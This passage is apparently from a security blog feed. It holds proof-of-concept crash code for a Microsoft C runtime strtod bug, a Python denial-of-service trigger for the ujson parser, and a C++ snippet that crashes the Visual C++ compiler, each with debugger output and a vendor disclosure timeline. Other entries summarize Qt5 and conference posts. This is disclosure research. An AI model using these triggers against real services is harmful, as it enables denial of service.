  • _Stodx/_Stod/_Stofx/_Stof - these use strtod
Worth looking for variants (e.g. __strgtold12_l/__strgtold12?).

Proof of concept

This proof of concept prints the correct and strtod returned end pointer.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(void) {

// SZ == INT_MAX + some more bytes
#define SZ 0x80000016

char *number = (char*)malloc(SZ);
memset(number, '1', SZ);
number[SZ-1] = 'm'; // Break syntax.
number[1] = '.'; // This is probably not needed.

char *end_good = number + SZ - 1;
char *end_strtod;

// strtod(number, &end_strtod); is OK too
// ... unless you use MinGW which uses it's own strtod,
// then it's better to just use _strtod_l for PoC.
_strtod_l(number, &end_strtod, NULL);

printf("number = %p\n", number);
printf("end_good = %p\n", end_good);
printf("end_strtod = %p\n", end_strtod);

// Example (faulty) results.
// number = 000000007FFF0040
// end_good = 00000000FFFF0055
// end_strtod = FFFFFFFFFFFF0055

return 0;

Real world example

A random JSON parser for Python with native code - ujson 1.33:

FASTCALL_ATTR JSOBJ FASTCALL_MSVC decodePreciseFloat(struct DecoderState *ds)
char *end;
double value;
errno = 0;

value = strtod(ds->start, &end);

if (errno == ERANGE)
return SetError(ds, -1, "Range error when decoding numeric as double");

ds->start = end;
return ds->dec->newDouble(ds->prv, value);

And a crash DoS PoC in Python (2.7 AMD64):

import ujson

n = "4." + "3"*0x7fffffff
x = ujson.loads(n, precise_float=True)

WinDBG says:

(2088.1fa4): Access violation - code c0000005 (first chance)
00000001`800050dc 8a0a mov cl,byte ptr [rdx] ds:00000001`00010061=??


I've reported the bug to Microsoft and the decision was to fix it in the future releases of Microsoft Visual C++ / Microsoft Windows. I think that's OK, especially taking into account that the possibility of severe vulnerabilities appearing as a result of this Microsoft C runtime library bug is minimal (that said, if you find one, let me know ;>).


Note: A lot of e-mails were flying back and forth, so I'm not going to list all dates.

2013-Aug-21: Send the report to Microsoft.
2013-Sep-17: Confirmation that the bugs works as described and are planned to be fixed.
2013-Oct-26: More information - the bug will be fixed in the next versions of msvcr*.dll.
2013-Nov-13: Microsoft receives the draft of this blog post from me for comments.
2013-Nov-23: Blogpost is public.

And that's it.

Appmenu Qt5: through a bumpy road, but working!

By sil2100 | Tue, 19 Nov 2013 21:19:00 GMT | @domain:
Some time ago I mentioned working on the global application menu for Qt5 - the so-called appmenu-qt5 for Ubuntu and its derivatives. After a longer while, I finally fount the time and occasion to resume my work - and, after a really bumpy ride, end up with a working solution. Some hacks had to be made, some Qt5 design decisions worked-around - but the end result is here: a working appmenu-qt5 QPA platformtheme plugin. In this post I would like to overview the implementation of the current proposed appmenu-qt5. Read on if you're interested in some of the Qt5 internals, workings of QPlatformTheme plugins and the confusing elements of the Qt Platform Abstraction in overall.

Windows System Call and CSR API tables updated

By j00ru | Sat, 16 Nov 2013 17:31:13 +0000 | @domain:
Having the first spare weekend in a really long time, I have decided it was high time to update some (all) of the tables related to Windows system calls and CSR API I once created and now try to maintain. This includes NT API syscalls for the 32-bit and 64-bit Intel platforms, win32k.sys syscalls for […]

ZeroNights 2013 and NTVDM vulnerabilities

By j00ru | Fri, 08 Nov 2013 10:00:53 +0000 | @domain:
Just yesterday I had the pleasure to speak at a highly hacking-oriented Russian conference, ZeroNights, for the second time (see my “ZeroNights slides, Hack In The Box Magazine #9 and other news” post from last year). The conference itself has been great so far – several interesting and inspiring talks, lots of leet Russian hackers […]

Windows win32k.sys menus and some “close, but no cigar” bugs

By j00ru | Thu, 12 Sep 2013 20:04:26 +0000 | @domain:
Welcome after one of the more lengthy breaks in the blog’s activity. Today, I would like to discuss none other than several interesting weaknesses around the implementation of menus (like, window menus) in the core component of the Microsoft Windows kernel – the infamous win32k.sys driver, also known as the “Java of Windows” in terms […]

Black Hat USA 2013, Bochspwn, slides and pointers

By j00ru | Tue, 13 Aug 2013 23:17:27 +0000 | @domain:
(Collaborative post by Mateusz “j00ru” Jurczyk and Gynvael Coldwind) Two weeks ago (we’re running late, sorry!) Gynvael and I had the pleasure to attend one of the largest, most technical and renowned conferences in existence – Black Hat 2013 in Las Vegas, USA. The event definitely stood up to our expectations – the city was purely […]

BlackHat USA 2013, Bochspwn, slides and pointers.

By Gynvael Coldwind | Tue, 13 Aug 2013 00:08:38 +0200 | @domain:
two gold pwnies with ping and violet hair (photo by Arashi Coldwind btw)(Collaborative post by Mateusz "j00ru" Jurczyk and Gynvael Coldwind)
Two weeks ago (we're running late, sorry!) j00ru and I had the pleasure to attend one of the largest, most technical and renowned conferences in existence - Black Hat 2013 in Las Vegas, USA. The event definitely stood up to our expectations - the city was purely awesome, the venue was at least as great, we saw many interesting and truly inspiring talks and a whole bunch of old friends, not to mention meeting a fair number of new folks. In addition to all this, our visit to Vegas turned out quite successful for other reasons too - our "Identifying and Exploiting Windows Kernel Race Conditions via Memory Access Patterns" work was nominated and eventually awarded a Pwnie (in fact, two mascots) in the "Most Innovative Research" category. Woot!

While the subject of memory access pattern analysis or the more general kernel instrumentation was only mentioned briefly when we originally released the first slide deck and whitepaper, as we mostly focused on the exploitation of constrained local kernel race conditions back then, our most recent Black Hat "Bochspwn: Identifying 0-days via System-Wide Memory Access Pattern Analysis" talk discussed the specifics of how the control flow of different operating systems' kernels can be logged, examined or changed for the purpose of identifying various types of local vulnerabilities. Demos were presented live and are not available publicly (especially considering that one of them was a 0-day).

Slides: “Bochspwn: Identifying 0-days via System-Wide Memory Access Pattern Analysis” (5.26MB, PDF)

During the conference, we also open-sourced our Bochs kernel instrumentation toolkit (including both the CPU instrumentation modules and post-processing tools) under the new name of "kfetch-toolkit". The project is hosted on github (see and is available for everyone to hack on under the Apache v2 license. Should you have any interesting results, concerns, questions or proposed patches, definitely drop us a line. We are looking forward to some meaningful, external contributions to the project. :-)

Last but not least, we have also explicitly mentioned that we would release all Bochspwn-generated logs that we had looked through and reported to corresponding vendors or deemed to be non-issues or non-exploitable. Below follows a moderately well explained list of reports, including information such as the original Bochspwn output, list of affected functions, our comments based on a (usually brief) investigation and the guest operating system and iteration number. Please note that a large number of Windows reports were assessed to be of a "NO FIX" class by Microsoft, and it might make sense to take another look at these and find out if the vendor didn't miss any obviously exploitable problems (unfortunately, we haven't had the time to perform a thorough analysis of each of the reports). Although a majority of the bugs were found in Windows, the Linux and BSD reports can certainly provide you with some interesting (yet not security-relevant) behavior and a fair dose of amusement. We hope you enjoy looking through the docs. Without further ado, here are the reports:




All comments are more then welcome. Take care!

Approaching BlackHat US 2013 and new Dragon Sector blog

By Gynvael Coldwind | Sat, 27 Jul 2013 00:08:37 +0200 | @domain:
(A shameless copy from j00ru's blog)
This is a quick reminder that Gynvael and I (j00ru) are going to attend BlackHat US 2013 in Las Vegas next week with the “Bochspwn: Identifying 0-days via System-Wide Memory Access Pattern Analysis” presentation on the second day of the event. The talk is going to largely extend our previous performance at SyScan this year (see this blog post), detailing the implementation of our “Bochspwn” project, discussing other approaches to system-wide instrumentation and how it can be effectively used to discover different local vulnerability classes (not just double fetches!) in widely used kernels. We will also provide a follow up on using Bochspwn against open-source platforms (Linux, FreeBSD, OpenBSD), including extensive coverage of our findings there, and last but not least, we will release the Bochs instrumentation toolkit as an open-source project for everyone to hack on. If you happen to be in the Sin City at the time, don’t hesitate to come by and say hi! See you there!

If you are not going to make it this time, expect the presentation slide deck shortly after the conference.

In other news, our CTF team called “Dragon Sector“ has recently started their own blog: The website is supposed to feature write-ups from the more interesting CTF tasks we manage to solve during the competitions. With merely four posts so far, the blog is surely going to fill up with interesting posts as we play contests in the near future, so be sure to keep an eye on it.


Rile.js - html5 epub reader

By xa | Thu, 25 Jul 2013 20:00:00 GMT | @domain:

What is it?

It's a small HTML5 based EPUB document reader. I’ve created it partially for my fiancée’s writing blog, and partially because I have never done anything with an EPUB format, and I didn’t know anything about it.

Right now the reader is in an early alpha stage and works on Google Chrome and Mozilla Firefox. The next step is to get it working on IE9/10 and other browsers.

For those who don’t know what an EPUB document is - EPUB is a standarised open format for electronic publications. It is based on XML documents compressed together as a single zip file. The most important properties of this format are:

  • An EPUB document is not divided into pages, the reading software decides how to divide the content into pages and how to display it,
  • It supports CSS,
  • Support for SVG and raster images.

Right now the goal for me is to create a simple reader that supports as many simple EPUB documents as possible, so anyone (eg. a writer) can embed an EPUB document on his blog or page.

Time for some short technical summary.

Approaching BlackHat US 2013 and new Dragon Sector blog

By j00ru | Wed, 24 Jul 2013 15:04:25 +0000 | @domain:
This is a quick reminder that Gynvael and I are going to attend BlackHat US 2013 in Las Vegas next week with the “Bochspwn: Identifying 0-days via System-Wide Memory Access Pattern Analysis” presentation on the second day of the event. The talk is going to largely extend our previous performance at SyScan this year (see […]

QMake - forcing no install target AKA target flags

By sil2100 | Wed, 10 Jul 2013 19:13:00 GMT | @domain:
I had an annoying problem today to which I finally found a workaround for. Let's assume we're using qmake and the 'testcase' CONFIG for a given target. Strangely, whenever the testcase configuration is used for a given project, all test targets are generated with their 'make install' targets in the Makefile (if the Makefile generator is used, of course). Even when we're not adding the target to INSTALLS. But what if we don't want to install the given testcase anywhere? Qt4 ant Qt5 docs say nothing. But the qmake source code says all.

Changing the cursor shape in Windows proven difficult by NVIDIA (and AMD)

By j00ru | Mon, 01 Jul 2013 12:22:49 +0000 | @domain:
If you work in the software engineering or information security field, you should be familiar with all sorts of software bugs – the functional and logical ones, those found during the development and internal testing along with those found and reported by a number of complaining users, those that manifest themselves in the form of […]

Crashing the Visual C++ compiler

By Gynvael Coldwind | Mon, 24 Jun 2013 00:08:30 +0200 | @domain:
In September last year I received a programming question regarding multi-level multiple same-base inheritance in C++, under one of my video tutorials on YouTube. I started playing with some tests and went a little too extreme for the likings of Microsoft 32-bit C/C++ Optimizing Compiler (aka Visual C++), which crashed while trying to compile some of the test cases. After some debugging, it turned out that it crashed on a rather nasty memory write operation, which could be potentially exploitable. Given that I was occupied with other work at the time, I decided to report it immediately to Microsoft with just a DoS proof of concept exploit. After 9 months the condition was confirmed to be exploitable and potentially useful in an attack against a build service, but was not considered a security vulnerability by Microsoft on the basis that only trusted parties should be allowed to access a build service, because such access enables one to run arbitrary code anyway (and the documentation has been updated to explicitly state this).

Heads up!

If you are running a build service (Team Foundation Build Service), you might be interested in the following security note in this MSDN article:

Installing Team Foundation Build Service increases the attack surface of the computer. Because developers are treated as trusted entities in the build system, a malicious user could, for example, construct a build definition to run arbitrary code that is designed to take control of the server and steal data from Team Foundation Server. Customers are encouraged to follow security best practices as well as deploy defense in-depth measures to ensure that their build environment is secure. This includes developer workstations. For more information regarding security best practices, see the TechNet Article Security Guidance.
In other words (keep in mind I'm not a build service expert, but this is how I understand it):
  • Having access to a build service is equivalent to being able to execute arbitrary code with its privileges on the build server.
  • It is best to lock down the build service, so that a potential compromise of a developer's machine doesn't grant the attacker an instant "Administrator" on the build server.
  • You should make sure that the machines used by the programmers are fully trusted and secure (this is an obvious weak spot). Owning one dev's machine allows rapid propagation to both the build server and other programmers' machines that use the same build service (e.g. by hijacking the build process and generating "evil" DLLs/EXEs/OBJs/LIBs instead of what really was supposed to be built), not to mention the testers machines, etc.

To sum up, a vulnerability in a compiler doesn't really change the picture that much, since even without exploiting the compiler a person having access to the build service can execute arbitrary code with its privileges.

The code that crashes

The C++ code snippet capable of crashing the Microsoft C/C++ Optimizing compiler is shown below, with most details included in the comments (note: this bug is scheduled to be fixed in the future):

#include <stdio.h>

class A { public: int alot[1024]; };
class B : public A { public: int more[1024]; };
class C : public A { public: int more[1024]; };
class DA : public B,C { public: int much[1024]; };
class DB : public B,C { public: int much[1024]; };

#define X(a) \
class a ## AA : public a ## A, a ## B { public: int a ## AA_more[1024]; }; \
class a ## AB : public a ## A, a ## B { public: int a ## AB_more[1024]; }

#define Y(a) \
X(a); X(a ## A); X(a ## AA); X(a ## AAA); X(a ## AAAA); \
X(a ## AAAAA); X(a ## AAAAAA); X(a ## AAAAAAA)


// Funny story. Without global it doesn't compile (LNK1248).
// But with global it seems to overflow, and it compiles OK.
int global[0x12348];

int main(void) {

printf("%p\n", &x);
printf("%p\n", &x.DAAAAAAAAA_more[0]); // <--- customize this with changing
// DAA...AA_more to different
// amount of 'A'

// Funny story no. 2. This above crashes the compiler (MSVC 16.00.30319.01):
// test.cpp(61) : fatal error C1001: An internal error has occurred in the compiler.
// (compiler file 'msc1.cpp', line 1420)
// To work around this problem, try simplifying or changing the program near the locations listed above.
// Please choose the Technical Support command on the Visual C++
// Help menu, or open the Technical Support help file for more information
// Internal Compiler Error in cl.exe. You will be prompted to send an error report to Microsoft later.
// (2154.dd4): Access violation - code c0000005 (first chance)
// First chance exceptions are reported before any exception handling.
// This exception may be expected and handled.
// eax=00000000 ebx=0044dd34 ecx=0000006c edx=00000766 esi=049a8890 edi=049f3fc0
// eip=73170bb7 esp=0044cd38 ebp=0044cd44 iopl=0 nv up ei pl nz na pe cy
// cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010207
// MSVCR100!_VEC_memcpy+0x5a:
// 73170bb7 660f7f6740 movdqa xmmword ptr [edi+40h],xmm4 ds:002b:049f4000=????????????????????????????????

return 0;

As previously mentioned, I didn't really have the time to delve into the details, but it seems the immediate reason of the crash is an invocation of memcpy() with a semi-controlled destination address (EDI is influenced by the source code).

If you manage to prove that the bug is exploitable, let me know!

Vendor communication timeline

2012-09-30: Report sent to Microsoft (DoS only PoC).
2012-10-01: Received ACK + request for further clarification.
2012-10-03: Received information that the crash appears to be exploitable.
2012-10-03: Sent clarification.
2012-11-01: Received confirmation that the issue is exploitable, and that it will not be treated as a security issue, but as a reliability issue.
2012-11-01: Sent description of a potential attack on a build server as a counterargument for it not being a security bug.
2012-11-06: Received ACK + information that the bug will be discussed again with the product team.
2012-12-18: Received "we are still working on it".
2013-01-31: Sent a ping.
2013-06-03: Sent a ping.
2013-06-15: Received information that the bug will be considered as a reliability issue. The build server documentation is updated with a security note.
2013-06-21: Sent a heads up with this blog post.
2013-06-24: Published this blog post.


A pretty awesome blog post with a gathering of compiler crashes (thx goes to Meredith for pointing this out):
57 Small Programs that Crash Compilers

Appmenu Qt5: starting work - QPA, QPlatformThemeFactory

By sil2100 | Thu, 20 Jun 2013 01:08:00 GMT | @domain:
All has been very busy lately, as managing the daily-release process and tools for Ubuntu proved being more challenging then we have expected. In the meantime though, I am also working on creating proper Ubuntu appmenu support for Qt5 by the use of the Qt Platform Abstraction (QPA) API. Not a hard task, but without proper time resources even this can be a bit troublesome. I would like to use this post to iterate some of the things that I have learned related to the Qt5 QPA topic, as well as mentioning some plans, concepts and remarks to proper Ubuntu appmenu support for Qt5, as designed by me.